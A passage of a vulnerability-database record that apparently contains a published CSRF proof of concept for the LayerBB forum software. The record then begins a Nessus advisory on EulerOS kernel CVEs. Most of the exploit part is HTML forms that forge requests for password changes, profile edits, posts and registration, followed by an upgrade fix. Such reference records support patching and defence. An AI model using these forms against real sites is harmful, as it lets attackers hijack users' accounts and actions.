/><br /> User: Administrator <br />Pass: admin (Case sensitive)<br /><br />This demo gets refreshed every 24-hours.</div></textarea>\r\n </div>\r\n <div class=\"form-group\">\r\n <label for=\"style\">Style</label>\r\n <select class=\"form-control\" id=\"style\" name=\"style\">\r\n <option value=\"danger\">Current - Do Not Change</option>\r\n <option value=\"primary\">Primary</option>\r\n <option value=\"success\">Success</option>\r\n <option value=\"info\">Info</option>\r\n <option value=\"warning\">Warning</option>\r\n <option value=\"danger\">Danger</option></select>\r\n </div>\r\n <div class=\"form-group\">\r\n <label for=\"glyphicon\">Glyphicon (Optional)</label>\r\n <input type=\"text\" class=\"form-control\" id=\"glyphicon\" name=\"glyphicon\" value=\"alert\">\r\n </div>\r\n <div class=\"form-group\">\r\n <label for=\"order\">Order</label>\r\n <input type=\"text\" class=\"form-control\" id=\"order\" name=\"order\" value=\"1\">\r\n </div>\r\n <button type=\"submit\" name=\"savechange\" id=\"savechange\" class=\"btn btn-primary\">Save Changes</button>\r\n</form>\r\n<!-- Sidebar CSRF End -->\r\n\r\n<!-- Edit Threads/Posts CSRF -->\r\n<form id=\"LAYER_form\" action=\"http://localhost/edit.php/post/1\" method=\"POST\" style=\"padding: 25px;\">\r\n <input id=\"title\" name=\"title\" type=\"text\" value=\"test\"><br>\r\n <textarea id=\"editor\" name=\"content\" style=\"width: 100%; height: 300px; max-width: 100%; min-width: 100%;\">test post</textarea>\r\n <br>\r\n <input type=\"submit\" name=\"edit\" value=\"Edit Post\">\r\n</form>\r\n<!-- Edit Threads/Posts CSRF -->\r\n\r\n<!-- New Threads/Posts CSRF -->\r\n<form id=\"LAYER_form\" action=\"http://localhost/new.php/node/1\" method=\"POST\" style=\"padding: 25px;\">\r\n <input type=\"text\" name=\"title\" placeholder=\"Thread Title...\" style=\"width:100%;\" class=\"col-sm-9 form-control\">\r\n <div class=\"clearfix\"></div>\r\n <br>\r\n <textarea id=\"editor\" style=\"width: 100%; height: 300px; max-width: 100%;\" name=\"content\"></textarea>\r\n\r\n <div class=\"center-block\" style=\"margin-top:5px;\">\r\n <input type=\"submit\" name=\"create\" value=\"Create Thread\">\r\n </div>\r\n\r\n <br>\r\n <ul class=\"nav nav-tabs\">\r\n <li class=\"active\"><a href=\"#polls\" data-toggle=\"tab\">Polls</a></li>\r\n </ul>\r\n <div class=\"tab-content\">\r\n <div class=\"tab-pane active\" id=\"polls\">\r\n <div class=\"col-md-6\">\r\n <label for=\"question\">Question</label>\r\n <input type=\"text\" name=\"question\">\r\n <label for=\"answer_1\">1. Answer</label>\r\n <input type=\"text\" name=\"answer_1\" id=\"answer_1\">\r\n <label for=\"answer_2\">2. Answer</label>\r\n <input type=\"text\" name=\"answer_2\" id=\"answer_2\">\r\n <span class=\"btn btn-primary btn-xs\" href=\"\" onclick=\"plus();\"> Add an answer field </span>\r\n </div>\r\n </div>\r\n </div>\r\n</form>\r\n<!-- New Threads/Posts CSRF End -->\r\n\r\n<!-- Thread Reply CSRF -->\r\n<form id=\"LAYER_form\" action=\"http://localhost/reply.php/test.1\" method=\"POST\" style=\"padding: 25px;\">\r\n <textarea id=\"editor\" style=\"width: 100%; height: 300px;\" name=\"content\"></textarea>\r\n <p class=\"pull-right\" style=\"margin-top:5px;\">\r\n <input type=\"submit\" name=\"reply\" value=\"Post Reply\">\r\n </p>\r\n</form>\r\n<!-- Thread Reply CSRF End -->\r\n\r\n<!-- PM Reply CSRF -->\r\n<form id=\"%form_id%\" action=\"http://localhost/conversations.php/cmd/reply/id/1\" method=\"POST\" style=\"padding: 25px;\">\r\n <textarea id=\"editor\" style=\"width: 100%; height: 300px;\" name=\"content\"></textarea>\r\n <p class=\"pull-right\" style=\"margin-top:5px;\">\r\n <input type=\"submit\" name=\"reply\" value=\"Post Reply\">\r\n </p>\r\n</form>\r\n<!-- PM Reply CSRF End -->\r\n\r\n<!-- Report Post CSRF -->\r\n<form action=\"http://localhost/report.php/post/1\" id=\"LAYER_form\" method=\"POST\" style=\"padding: 25px;\">\r\n <label for=\"reason\">Reason</label>\r\n <textarea name=\"reason\" style=\"height:150px;width:100%;min-width:100%;max-width:100%;\"></textarea>\r\n <br>\r\n <input type=\"submit\" name=\"report\" value=\"Report\">\r\n</form>\r\n<!-- Report Post CSRF End -->\r\n\r\n<!-- Edit Profile CSRF -->\r\n<form id=\"LAYER_form\" action=\"http://localhost/profile.php/cmd/edit\" method=\"POST\" style=\"padding: 25px;\">\r\n <label for=\"email\">Email</label>\r\n <input type=\"text\" name=\"email\" id=\"email\" value=\"[email\u00a0protected]\">\r\n <label for=\"usermsg\">User Message</label>\r\n <input type=\"text\" name=\"usermsg\" id=\"usermsg\" value=\"User\">\r\n <label for=\"gender\">Gender</label>\r\n <select id=\"gender\" name=\"gender\"><option value=\"0\" selected=\"selected\">Not telling</option>\r\n <option value=\"1\">Female</option>\r\n <option value=\"2\">Male</option></select>\r\n <label for=\"timezone\">Timezone</label>\r\n <select id=\"timezone\" name=\"timezone\"><option value=\"Pacific/Midway\">(UTC-11:00) Midway Island</option><option value=\"Pacific/Samoa\">(UTC-11:00) Samoa</option><option value=\"Pacific/Honolulu\">(UTC-10:00) Hawaii</option><option value=\"US/Alaska\">(UTC-09:00) Alaska</option><option value=\"America/Los_Angeles\">(UTC-08:00) Pacific Time (US & Canada)</option><option value=\"America/Tijuana\">(UTC-08:00) Tijuana</option><option value=\"US/Arizona\">(UTC-07:00) Arizona</option><option value=\"America/Chihuahua\">(UTC-07:00) Chihuahua</option><option value=\"America/Chihuahua\">(UTC-07:00) La Paz</option><option value=\"America/Mazatlan\">(UTC-07:00) Mazatlan</option><option value=\"US/Mountain\">(UTC-07:00) Mountain Time (US & Canada)</option><option value=\"America/Managua\">(UTC-06:00) Central America</option><option value=\"US/Central\" selected=\"selected\">(UTC-06:00) Central Time (US & Canada)</option><option value=\"America/Mexico_City\">(UTC-06:00) Guadalajara</option><option value=\"America/Mexico_City\">(UTC-06:00) Mexico City</option><option value=\"America/Monterrey\">(UTC-06:00) Monterrey</option><option value=\"Canada/Saskatchewan\">(UTC-06:00) Saskatchewan</option><option value=\"America/Bogota\">(UTC-05:00) Bogota</option><option value=\"US/Eastern\">(UTC-05:00) Eastern Time (US & Canada)</option><option value=\"US/East-Indiana\">(UTC-05:00) Indiana (East)</option><option value=\"America/Lima\">(UTC-05:00) Lima</option><option value=\"America/Bogota\">(UTC-05:00) Quito</option><option value=\"Canada/Atlantic\">(UTC-04:00) Atlantic Time (Canada)</option><option value=\"America/Caracas\">(UTC-04:30) Caracas</option><option value=\"America/La_Paz\">(UTC-04:00) La Paz</option><option value=\"America/Santiago\">(UTC-04:00) Santiago</option><option value=\"Canada/Newfoundland\">(UTC-03:30) Newfoundland</option><option value=\"America/Sao_Paulo\">(UTC-03:00) Brasilia</option><option value=\"America/Argentina/Buenos_Aires\">(UTC-03:00) Buenos Aires</option><option value=\"America/Argentina/Buenos_Aires\">(UTC-03:00) Georgetown</option><option value=\"America/Godthab\">(UTC-03:00) Greenland</option><option value=\"America/Noronha\">(UTC-02:00) Mid-Atlantic</option><option value=\"Atlantic/Azores\">(UTC-01:00) Azores</option><option value=\"Atlantic/Cape_Verde\">(UTC-01:00) Cape Verde Is.</option><option value=\"Africa/Casablanca\">(UTC+00:00) Casablanca</option><option value=\"Europe/London\">(UTC+00:00) Edinburgh</option><option value=\"Etc/Greenwich\">(UTC+00:00) Greenwich Mean Time : Dublin</option><option value=\"Europe/Lisbon\">(UTC+00:00) Lisbon</option><option value=\"Europe/London\">(UTC+00:00) London</option><option value=\"Africa/Monrovia\">(UTC+00:00) Monrovia</option><option value=\"UTC\">(UTC+00:00) UTC</option><option value=\"Europe/Amsterdam\">(UTC+01:00) Amsterdam</option><option value=\"Europe/Belgrade\">(UTC+01:00) Belgrade</option><option value=\"Europe/Berlin\">(UTC+01:00) Berlin</option><option value=\"Europe/Berlin\">(UTC+01:00) Bern</option><option value=\"Europe/Bratislava\">(UTC+01:00) Bratislava</option><option value=\"Europe/Brussels\">(UTC+01:00) Brussels</option><option value=\"Europe/Budapest\">(UTC+01:00) Budapest</option><option value=\"Europe/Copenhagen\">(UTC+01:00) Copenhagen</option><option value=\"Europe/Ljubljana\">(UTC+01:00) Ljubljana</option><option value=\"Europe/Madrid\">(UTC+01:00) Madrid</option><option value=\"Europe/Paris\">(UTC+01:00) Paris</option><option value=\"Europe/Prague\">(UTC+01:00) Prague</option><option value=\"Europe/Rome\">(UTC+01:00) Rome</option><option value=\"Europe/Sarajevo\">(UTC+01:00) Sarajevo</option><option value=\"Europe/Skopje\">(UTC+01:00) Skopje</option><option value=\"Europe/Stockholm\">(UTC+01:00) Stockholm</option><option value=\"Europe/Vienna\">(UTC+01:00) Vienna</option><option value=\"Europe/Warsaw\">(UTC+01:00) Warsaw</option><option value=\"Africa/Lagos\">(UTC+01:00) West Central Africa</option><option value=\"Europe/Zagreb\">(UTC+01:00) Zagreb</option><option value=\"Europe/Athens\">(UTC+02:00) Athens</option><option value=\"Europe/Bucharest\">(UTC+02:00) Bucharest</option><option value=\"Africa/Cairo\">(UTC+02:00) Cairo</option><option value=\"Africa/Harare\">(UTC+02:00) Harare</option><option value=\"Europe/Helsinki\">(UTC+02:00) Helsinki</option><option value=\"Europe/Istanbul\">(UTC+02:00) Istanbul</option><option value=\"Asia/Jerusalem\">(UTC+02:00) Jerusalem</option><option value=\"Europe/Helsinki\">(UTC+02:00) Kyiv</option><option value=\"Africa/Johannesburg\">(UTC+02:00) Pretoria</option><option value=\"Europe/Riga\">(UTC+02:00) Riga</option><option value=\"Europe/Sofia\">(UTC+02:00) Sofia</option><option value=\"Europe/Tallinn\">(UTC+02:00) Tallinn</option><option value=\"Europe/Vilnius\">(UTC+02:00) Vilnius</option><option value=\"Asia/Baghdad\">(UTC+03:00) Baghdad</option><option value=\"Asia/Kuwait\">(UTC+03:00) Kuwait</option><option value=\"Europe/Minsk\">(UTC+03:00) Minsk</option><option value=\"Africa/Nairobi\">(UTC+03:00) Nairobi</option><option value=\"Asia/Riyadh\">(UTC+03:00) Riyadh</option><option value=\"Europe/Volgograd\">(UTC+03:00) Volgograd</option><option value=\"Asia/Tehran\">(UTC+03:30) Tehran</option><option value=\"Asia/Muscat\">(UTC+04:00) Abu Dhabi</option><option value=\"Asia/Baku\">(UTC+04:00) Baku</option><option value=\"Europe/Moscow\">(UTC+04:00) Moscow</option><option value=\"Asia/Muscat\">(UTC+04:00) Muscat</option><option value=\"Europe/Moscow\">(UTC+04:00) St. Petersburg</option><option value=\"Asia/Tbilisi\">(UTC+04:00) Tbilisi</option><option value=\"Asia/Yerevan\">(UTC+04:00) Yerevan</option><option value=\"Asia/Kabul\">(UTC+04:30) Kabul</option><option value=\"Asia/Karachi\">(UTC+05:00) Islamabad</option><option value=\"Asia/Karachi\">(UTC+05:00) Karachi</option><option value=\"Asia/Tashkent\">(UTC+05:00) Tashkent</option><option value=\"Asia/Calcutta\">(UTC+05:30) Chennai</option><option value=\"Asia/Kolkata\">(UTC+05:30) Kolkata</option><option value=\"Asia/Calcutta\">(UTC+05:30) Mumbai</option><option value=\"Asia/Calcutta\">(UTC+05:30) New Delhi</option><option value=\"Asia/Calcutta\">(UTC+05:30) Sri Jayawardenepura</option><option value=\"Asia/Katmandu\">(UTC+05:45) Kathmandu</option><option value=\"Asia/Almaty\">(UTC+06:00) Almaty</option><option value=\"Asia/Dhaka\">(UTC+06:00) Astana</option><option value=\"Asia/Dhaka\">(UTC+06:00) Dhaka</option><option value=\"Asia/Yekaterinburg\">(UTC+06:00) Ekaterinburg</option><option value=\"Asia/Rangoon\">(UTC+06:30) Rangoon</option><option value=\"Asia/Bangkok\">(UTC+07:00) Bangkok</option><option value=\"Asia/Bangkok\">(UTC+07:00) Hanoi</option><option value=\"Asia/Jakarta\">(UTC+07:00) Jakarta</option><option value=\"Asia/Novosibirsk\">(UTC+07:00) Novosibirsk</option><option value=\"Asia/Hong_Kong\">(UTC+08:00) Beijing</option><option value=\"Asia/Chongqing\">(UTC+08:00) Chongqing</option><option value=\"Asia/Hong_Kong\">(UTC+08:00) Hong Kong</option><option value=\"Asia/Krasnoyarsk\">(UTC+08:00) Krasnoyarsk</option><option value=\"Asia/Kuala_Lumpur\">(UTC+08:00) Kuala Lumpur</option><option value=\"Australia/Perth\">(UTC+08:00) Perth</option><option value=\"Asia/Singapore\">(UTC+08:00) Singapore</option><option value=\"Asia/Taipei\">(UTC+08:00) Taipei</option><option value=\"Asia/Ulan_Bator\">(UTC+08:00) Ulaan Bataar</option><option value=\"Asia/Urumqi\">(UTC+08:00) Urumqi</option><option value=\"Asia/Irkutsk\">(UTC+09:00) Irkutsk</option><option value=\"Asia/Tokyo\">(UTC+09:00) Osaka</option><option value=\"Asia/Tokyo\">(UTC+09:00) Sapporo</option><option value=\"Asia/Seoul\">(UTC+09:00) Seoul</option><option value=\"Asia/Tokyo\">(UTC+09:00) Tokyo</option><option value=\"Australia/Adelaide\">(UTC+09:30) Adelaide</option><option value=\"Australia/Darwin\">(UTC+09:30) Darwin</option><option value=\"Australia/Brisbane\">(UTC+10:00) Brisbane</option><option value=\"Australia/Canberra\">(UTC+10:00) Canberra</option><option value=\"Pacific/Guam\">(UTC+10:00) Guam</option><option value=\"Australia/Hobart\">(UTC+10:00) Hobart</option><option value=\"Australia/Melbourne\">(UTC+10:00) Melbourne</option><option value=\"Pacific/Port_Moresby\">(UTC+10:00) Port Moresby</option><option value=\"Australia/Sydney\">(UTC+10:00) Sydney</option><option value=\"Asia/Yakutsk\">(UTC+10:00) Yakutsk</option><option value=\"Asia/Vladivostok\">(UTC+11:00) Vladivostok</option><option value=\"Pacific/Auckland\">(UTC+12:00) Auckland</option><option value=\"Pacific/Fiji\">(UTC+12:00) Fiji</option><option value=\"Pacific/Kwajalein\">(UTC+12:00) International Date Line West</option><option value=\"Asia/Kamchatka\">(UTC+12:00) Kamchatka</option><option value=\"Asia/Magadan\">(UTC+12:00) Magadan</option><option value=\"Pacific/Fiji\">(UTC+12:00) Marshall Is.</option><option value=\"Asia/Magadan\">(UTC+12:00) New Caledonia</option><option value=\"Asia/Magadan\">(UTC+12:00) Solomon Is.</option><option value=\"Pacific/Auckland\">(UTC+12:00) Wellington</option><option value=\"Pacific/Tongatapu\">(UTC+13:00) Nuku'alofa</option></select>\r\n <br>\r\n <label for=\"location\">Location</label>\r\n <select id=\"location\" name=\"location\"><option value=\"--\" selected=\"selected\">Nothing selected</option><option value=\"AD\">Andorra</option><option value=\"AE\">United Arab Emirates</option><option value=\"AF\">Afghanistan</option><option value=\"AG\">Antigua and Barbuda</option><option value=\"AI\">Anguilla</option><option value=\"AL\">Albania</option><option value=\"AM\">Armenia</option><option value=\"AO\">Angola</option><option value=\"AQ\">Antarctica</option><option value=\"AR\">Argentina</option><option value=\"AS\">American Samoa</option><option value=\"AT\">Austria</option><option value=\"AU\">Australia</option><option value=\"AW\">Aruba</option><option value=\"AX\">Aland Islands</option><option value=\"AZ\">Azerbaijan</option><option value=\"BA\">Bosnia and Herzegovina</option><option value=\"BB\">Barbados</option><option value=\"BD\">Bangladesh</option><option value=\"BE\">Belgium</option><option value=\"BF\">Burkina Faso</option><option value=\"BG\">Bulgaria</option><option value=\"BH\">Bahrain</option><option value=\"BI\">Burundi</option><option value=\"BJ\">Benin</option><option value=\"BL\">Saint Barth\u00e9lemy</option><option value=\"BM\">Bermuda</option><option value=\"BN\">Brunei Darussalam</option><option value=\"BO\">Bolivia</option><option value=\"BQ\">Bonaire</option><option value=\"BR\">Brazil</option><option value=\"BS\">Bahamas</option><option value=\"BT\">Bhutan</option><option value=\"BV\">Bouvet Island</option><option value=\"BW\">Botswana</option><option value=\"BY\">Belarus</option><option value=\"BZ\">Belize</option><option value=\"CA\">Canada</option><option value=\"CC\">Cocos Islands</option><option value=\"CD\">Congo (the Democratic Republic)</option><option value=\"CF\">Central African Republic</option><option value=\"CG\">Congo</option><option value=\"CH\">Switzerland</option><option value=\"CI\">Cote d'Ivoire</option><option value=\"CK\">Cook Islands</option><option value=\"CL\">Chile</option><option value=\"CM\">Cameroon</option><option value=\"CN\">China</option><option value=\"CO\">Colombia</option><option value=\"CR\">Costa Rica</option><option value=\"CU\">Cuba</option><option value=\"CV\">Cabo Verde</option><option value=\"CW\">Curacao</option><option value=\"CX\">Christmas Island</option><option value=\"CY\">Cyprus</option><option value=\"CZ\">Czech Republic</option><option value=\"DE\">Germany</option><option value=\"DJ\">Djibouti</option><option value=\"DK\">Denmark</option><option value=\"DM\">Dominica</option><option value=\"DO\">Dominican Republic</option><option value=\"DZ\">Algeria</option><option value=\"EC\">Ecuador</option><option value=\"EE\">Estonia</option><option value=\"EG\">Egypt</option><option value=\"EH\">Western Sahara</option><option value=\"ER\">Eritrea</option><option value=\"ES\">Spain</option><option value=\"ET\">Ethiopia</option><option value=\"FI\">Finland</option><option value=\"FJ\">Fiji</option><option value=\"FK\">Falkland Islands</option><option value=\"FM\">Micronesia</option><option value=\"FO\">Faroe Islands</option><option value=\"FR\">France</option><option value=\"GA\">Gabon</option><option value=\"GB\">United Kingdom</option><option value=\"GD\">Grenada</option><option value=\"GE\">Georgia</option><option value=\"GF\">French Guiana</option><option value=\"GG\">Guernsey</option><option value=\"GH\">Ghana</option><option value=\"GI\">Gibraltar</option><option value=\"GL\">Greenland</option><option value=\"GM\">Gambia</option><option value=\"GN\">Guinea</option><option value=\"GP\">Guadeloupe</option><option value=\"GQ\">Equatorial Guinea</option><option value=\"GR\">Greece</option><option value=\"GS\">South Georgia and the South Sandwich Islands</option><option value=\"GT\">Guatemala</option><option value=\"GU\">Guam</option><option value=\"GW\">Guinea-Bissau</option><option value=\"GY\">Guyana</option><option value=\"HK\">Hong Kong</option><option value=\"HM\">Heard Island and McDonald Islands</option><option value=\"HN\">Honduras</option><option value=\"HR\">Croatia</option><option value=\"HT\">Haiti</option><option value=\"HU\">Hungary</option><option value=\"ID\">Indonesia</option><option value=\"IE\">Ireland</option><option value=\"IL\">Israel</option><option value=\"IM\">Isle of Man</option><option value=\"IN\">India</option><option value=\"IO\">British Indian Ocean Territory</option><option value=\"IQ\">Iraq</option><option value=\"IR\">Iran</option><option value=\"IS\">Iceland</option><option value=\"IT\">Italy</option><option value=\"JE\">Jersey</option><option value=\"JM\">Jamaica</option><option value=\"JO\">Jordan</option><option value=\"JP\">Japan</option><option value=\"KE\">Kenya</option><option value=\"KG\">Kyrgyzstan</option><option value=\"KH\">Cambodia</option><option value=\"KI\">Kiribati</option><option value=\"KM\">Comoros</option><option value=\"KN\">Saint Kitts and Nevis</option><option value=\"KP\">The Democratic People's Republic of Korea</option><option value=\"KR\">The Republic of Korea</option><option value=\"KW\">Kuwait</option><option value=\"KY\">Cayman Islands</option><option value=\"KZ\">Kazakhstan</option><option value=\"LA\">Lao People's Democratic Republic</option><option value=\"LB\">Lebanon</option><option value=\"LC\">Saint Lucia</option><option value=\"LI\">Liechtenstein</option><option value=\"LK\">Sri Lanka</option><option value=\"LR\">Liberia</option><option value=\"LS\">Lesotho</option><option value=\"LT\">Lithuania</option><option value=\"LU\">Luxembourg</option><option value=\"LV\">Latvia</option><option value=\"LY\">Libya</option><option value=\"MA\">Morocco</option><option value=\"MC\">Monaco</option><option value=\"MD\">Moldova</option><option value=\"ME\">Montenegro</option><option value=\"MF\">Saint Martin</option><option value=\"MG\">Madagascar</option><option value=\"MH\">Marshall Islands</option><option value=\"MK\">Macedonia</option><option value=\"ML\">Mali</option><option value=\"MM\">Myanmar</option><option value=\"MN\">Mongolia</option><option value=\"MO\">Macao</option><option value=\"MP\">Northern Mariana Islands</option><option value=\"MQ\">Martinique</option><option value=\"MR\">Mauritania</option><option value=\"MS\">Montserrat</option><option value=\"MT\">Malta</option><option value=\"MU\">Mauritius</option><option value=\"MV\">Maldives</option><option value=\"MW\">Malawi</option><option value=\"MX\">Mexico</option><option value=\"MY\">Malaysia</option><option value=\"MZ\">Mozambique</option><option value=\"NA\">Namibia</option><option value=\"NC\">New Caledonia</option><option value=\"NE\">Niger</option><option value=\"NF\">Norfolk Islands</option><option value=\"NG\">Nigeria</option><option value=\"NI\">Nicaragua</option><option value=\"NL\">Netherlands</option><option value=\"NO\">Norway</option><option value=\"NP\">Nepal</option><option value=\"NR\">Nauru</option><option value=\"NU\">Niue</option><option value=\"NZ\">New Zealand</option><option value=\"OM\">Oman</option><option value=\"PA\">Panama</option><option value=\"PE\">Peru</option><option value=\"PF\">French Polynesia</option><option value=\"PG\">Papua New Guinea</option><option value=\"PH\">Philippines</option><option value=\"PK\">Pakistan</option><option value=\"PL\">Poland</option><option value=\"PM\">Saint Pierre and Miquelon</option><option value=\"PN\">Pitcairn</option><option value=\"PR\">Puerto Rico</option><option value=\"PS\">Palestine</option><option value=\"PT\">Portugal</option><option value=\"PW\">Palau</option><option value=\"PY\">Paraguay</option><option value=\"QA\">Qatar</option><option value=\"RE\">R\u00e9union</option><option value=\"RO\">Romania</option><option value=\"RS\">Serbia</option><option value=\"RU\">Russian Federation</option><option value=\"RW\">Rwanda</option><option value=\"SA\">Saudi Arabia</option><option value=\"SB\">Solomon Islands</option><option value=\"SC\">Seychelles</option><option value=\"SD\">Sudan</option><option value=\"SE\">Sweden</option><option value=\"SG\">Singapore</option><option value=\"SH\">Saint Helena</option><option value=\"SI\">Slovenia</option><option value=\"SJ\">Svalbard and Jan Mayen</option><option value=\"SK\">Slovakia</option><option value=\"SL\">Sierra Leone</option><option value=\"SM\">San Marino</option><option value=\"SN\">Senegal</option><option value=\"SO\">Somalia</option><option value=\"SR\">Suriname</option><option value=\"SS\">South Sudan</option><option value=\"ST\">Sao Tome and Pricipe</option><option value=\"SV\">El Salvador</option><option value=\"SX\">Sint Maarten</option><option value=\"SY\">Syrian Arab Republic</option><option value=\"SZ\">Swaziland</option><option value=\"TC\">Turks and Caicos Islands</option><option value=\"TD\">Chad</option><option value=\"TF\">French Southern Terrotories</option><option value=\"TG\">Togo</option><option value=\"TH\">Thailand</option><option value=\"TJ\">Tajikistan</option><option value=\"TK\">Tokelau</option><option value=\"TL\">Timor-Leste</option><option value=\"TM\">Turkmenistan</option><option value=\"TN\">Tunisia</option><option value=\"TO\">Tonga</option><option value=\"TR\">Turkey</option><option value=\"TT\">Trinidad and Tobago</option><option value=\"TV\">Tuvalu</option><option value=\"TW\">Taiwan</option><option value=\"TZ\">Tanzania</option><option value=\"UA\">Ukraine</option><option value=\"UG\">Uganda</option><option value=\"UM\">United States Minor Outlying Islands</option><option value=\"US\">United States</option><option value=\"UY\">Uruguay</option><option value=\"UZ\">Uzbekistan</option><option value=\"VA\">Holy See</option><option value=\"VC\">Venezuela</option><option value=\"VG\">Virgin Islands (GB)</option><option value=\"VI\">Virgin Islands (US)</option><option value=\"VN\">Viet Nam</option><option value=\"VU\">Vanatu</option><option value=\"WF\">Wallis and Futuna</option><option value=\"WS\">Samoa</option><option value=\"YE\">Yemen</option><option value=\"YT\">Mayotte</option><option value=\"ZA\">South Africa</option><option value=\"ZM\">Zambia</option><option value=\"ZW\">Zimbabwe</option></select>\r\n <br>\r\n <label for=\"birthday\">Birthday</label>\r\n <input type=\"text\" name=\"birthday\" id=\"birthday\" value=\"0000-00-00\">\r\n <span id=\"helpBlock\" class=\"help-block\">In the format of: YYYY-MM-DD</span>\r\n <label for=\"editor\">About You</label><br>\r\n <textarea name=\"about\" id=\"editor\" style=\"min-width: 100%; max-width: 100%; height: 150px;\"></textarea>\r\n <br>\r\n <div class=\"panel panel-default\">\r\n <div class=\"panel-heading\">Additional Profile Fields</div>\r\n <div class=\"panel-body\"></div>\r\n </div>\r\n <br>\r\n <input type=\"submit\" name=\"edit\" value=\"Save Changes\">\r\n</form>\r\n<!-- Edit Profile CSRF End -->\r\n\r\n<!-- Edit Signature CSRF -->\r\n<form id=\"LAYER_form\" action=\"http://localhost/profile.php/cmd/signature\" method=\"POST\" style=\"padding: 25px;\">\r\n <label for=\"sig\">Signature</label>\r\n <textarea name=\"sig\" id=\"editor\" style=\"width: 100%; height: 300px; max-width: 100%; min-width: 100%;\"></textarea>\r\n <br><br>\r\n <input type=\"submit\" name=\"edit\" value=\"Save Changes\">\r\n</form>\r\n<!-- Edit Signature CSRF End -->\r\n\r\n<!-- Change Password CSRF -->\r\n<form id=\"LAYER_form\" action=\"http://localhost/profile.php/cmd/password\" method=\"POST\" style=\"padding: 35px;\">\r\n <label for=\"current_password\">Current Password</label>\r\n <input type=\"password\" name=\"current_password\" id=\"current_password\">\r\n <label for=\"new_password\">New Password</label>\r\n <input type=\"password\" name=\"new_password\" id=\"new_password\">\r\n <br><br>\r\n <input type=\"submit\" name=\"edit\" value=\"Save Changes\">\r\n</form>\r\n<!-- Change Password CSRF End -->\r\n\r\n<!-- Forgot Password CSRF -->\r\n<form action=\"http://localhost/members.php/cmd/forgotpassword\" method=\"POST\" id=\"LAYER_form\" style=\"padding: 25px;\">\r\n <label for=\"email\">Email</label>\r\n <input type=\"text\" name=\"email\" id=\"email\" class=\"form-control\">\r\n <br><br>\r\n <input type=\"submit\" name=\"forget\" value=\"Send Email\" class=\"btn btn-default\">\r\n</form>\r\n<!-- Forgot Password CSRF End -->\r\n\r\n<!-- Reset Password CSRF -->\r\n<form action=\"http://localhost/members.php/cmd/resetpassword\" method=\"POST\" id=\"LAYER_form\" style=\"padding: 25px;\">\r\n <label for=\"password\">Password</label>\r\n <input type=\"password\" name=\"password\" id=\"password\" class=\"form-control\">\r\n <label for=\"a_password\">Confirm Password</label>\r\n <input type=\"password\" name=\"a_password\" id=\"a_password\" class=\"form-control\">\r\n <br><br>\r\n <input type=\"submit\" name=\"reset\" value=\"Reset Password\" class=\"btn btn-default\">\r\n</form>\r\n<!-- Reset Password CSRF End -->\r\n\r\n<!-- Register Account CSRF -->\r\n<form action=\"http://localhost/members.php/cmd/register\" method=\"POST\" style=\"padding: 25px;\">\r\n <label for=\"username\">Username</label>\r\n <input type=\"text\" name=\"username\" value=\"\" id=\"username\" class=\"form-control\">\r\n <label for=\"password\">Password</label>\r\n <input type=\"password\" name=\"password\" id=\"password\" class=\"form-control\">\r\n <label for=\"a_password\">Confirm Password</label>\r\n <input type=\"password\" name=\"a_password\" id=\"a_password\" class=\"form-control\">\r\n <label for=\"email\">Email</label>\r\n <input type=\"text\" name=\"email\" value=\"\" id=\"email\" class=\"form-control\">\r\n <label for=\"LayerBB_captcha\">Are you a bot?</label><br>\r\n <img src=\"http://localhost/public/img/captcha.php\" alt=\"LayerBB Captcha\"><br><input type=\"text\" id=\"LayerBB_captcha\" name=\"LayerBB_captcha\">\r\n <br><br>\r\n <input type=\"submit\" name=\"register\" value=\"Register\" class=\"btn btn-default\">\r\n By clicking \"Register\", you agree to abide by the forum rules located <a href=\"http://localhost/members.php/cmd/rules\">here</a>.\r\n</form>\r\n<!-- Register Account CSRF End -->\r\n\r\n\r\n\r\n3. Solution:\r\nUpdate to 1.1.4\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://0day.today/exploit/33269"}], "nessus": [{"lastseen": "2019-11-27T10:06:07", "bulletinFamily": "scanner", "description": "According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - drivers/hid/hid-zpff.c in the Human Interface Device\n (HID) subsystem in the Linux kernel through 3.11, when\n CONFIG_HID_ZEROPLUS is enabled, allows physically\n proximate attackers to cause a denial of service\n (heap-based out-of-bounds write) via a crafted\n device.(CVE-2013-2889)\n\n - The capabilities implementation in the Linux kernel\n before 3.14.8 does not properly consider that\n namespaces are inapplicable to inodes, which allows\n local users to bypass intended chmod restrictions by\n first creating a user namespace, as demonstrated by\n setting the setgid bit on a file with group ownership\n of root.(CVE-2014-4014)\n\n - The function drivers/usb/core/config.c in the Linux\n kernel, allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB device,\n related to the USB_DT_INTERFACE_ASSOCIATION\n descriptor.(CVE-2017-16531)\n\n - The snd_timer_interrupt function in sound/core/timer.c\n in the Linux kernel before 4.4.1 does not properly\n maintain a certain linked list, which allows local\n users to cause a denial of service (race condition and\n system crash) via a crafted ioctl call.(CVE-2016-2545)\n\n - A flaw was found in the Linux kernel where the deletion\n of a file or directory could trigger an unmount and\n reveal data under a mount point. This flaw was\n inadvertently introduced with the new feature of being\n able to lazily unmount a mount tree when using file\n system user namespaces.(CVE-2015-4176)\n\n - The do_shmat function in ipc/shm.c in the Linux kernel,\n through 4.9.12, does not restrict the address\n calculated by a certain rounding operation. This allows\n privileged local users to map page zero and,\n consequently, bypass a protection mechanism that exists\n for the mmap system call. This is possible by making\n crafted shmget and shmat system calls in a privileged\n context.(CVE-2017-5669)\n\n - In drivers/net/ethernet/hisilicon/hns/hns_enet.c in the\n Linux kernel, before 4.13, local users can cause a\n denial of service (use-after-free and BUG) or possibly\n have unspecified other impact by leveraging differences\n in skb handling between hns_nic_net_xmit_hw and\n hns_nic_net_xmit.(CVE-2017-18218)\n\n - The ioapic_deliver function in virt/kvm/ioapic.c in the\n Linux kernel through 3.14.1 does not properly validate\n the kvm_irq_delivery_to_apic return value, which allows\n guest OS users to cause a denial of service (host OS\n crash) via a crafted entry in the redirection table of\n an I/O APIC. NOTE: the affected code was moved to the\n ioapic_service function before the vulnerability was\n announced.(CVE-2014-0155)\n\n - A flaw was found in the way the Linux kernel", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2019-1471.NASL", "href": "https://www.tenable.com/plugins/nessus/124795", "published": "2019-05-13T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : kernel 